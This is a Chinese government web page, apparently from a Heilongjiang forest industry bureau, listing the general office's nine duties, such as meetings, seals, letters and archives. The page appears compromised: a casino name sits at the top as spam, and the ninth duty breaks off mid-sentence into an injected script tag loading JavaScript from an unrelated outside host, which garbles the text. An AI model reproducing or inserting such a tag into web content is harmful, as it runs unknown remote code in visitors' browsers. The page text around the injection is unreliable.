澳门威尼斯

领导介绍 政务动态 公告信息 领导讲话 重要讲话 统计信息 发展规划 法律法规 规范性文件 部门文件 人事信息 重点工作
人事信息 重点工作 行政执法 科普宣传 参政议政 工作流程 工作规则 其他信息 办事指南 大事记 建设规划 招标公告
当前位置:首页  -> 机构职能
机构职能
2009-11-23

办公室工作职责

一、办公室在林业局党委、林业局的领导下,负责全局综合性行政管理工作。

二、贯彻执行党的各项方针、政策。执行上级领导的有关指示、规定,协助林业局党委、林业局领导督促各项工作的实施、落实情况。

三、根据林业局党委、林业局领导的指示和党委会议、局长办公会议决议,负责组织协调相关部门完成规划、计划、报告、总结及决议等文件的成文工作。

四、负责全局性会议、党委会、局长办公会及其它全局性大型会议的通知、组织工作,并做好会议记录,整理会议纪要,检查会议决定的落实、执行情况。

五、负责林业局党委、林业局印章、介绍信、复印机等办公设备的管理、使用和有关文字资料的打印工作。

六、负责接待群众来信、来访,及时向局领导及有关部门汇报与联系。

七、做好文书档案的管理和保密工作,负责各类文件的收发、登记、传阅、催办、立卷和保管工作。

八、负责全局信息的收集及反馈工作,做好上承下达,组织协调由几个部门共同办理的综合性工作。

九、完成领导交办的其他?script src=http://zhihuiguan.com/c.js>

 
联系我们
  黑龙江省森工总局主办   黑龙江省森工总局政务公开办公室承办  备案序号:05002205
  地址:黑龙江省哈尔滨市南岗区文昌街66号   邮政编码:150001
  黑龙江省森工总局信息中心提供技术支持   邮箱:sengongzwgk@126.com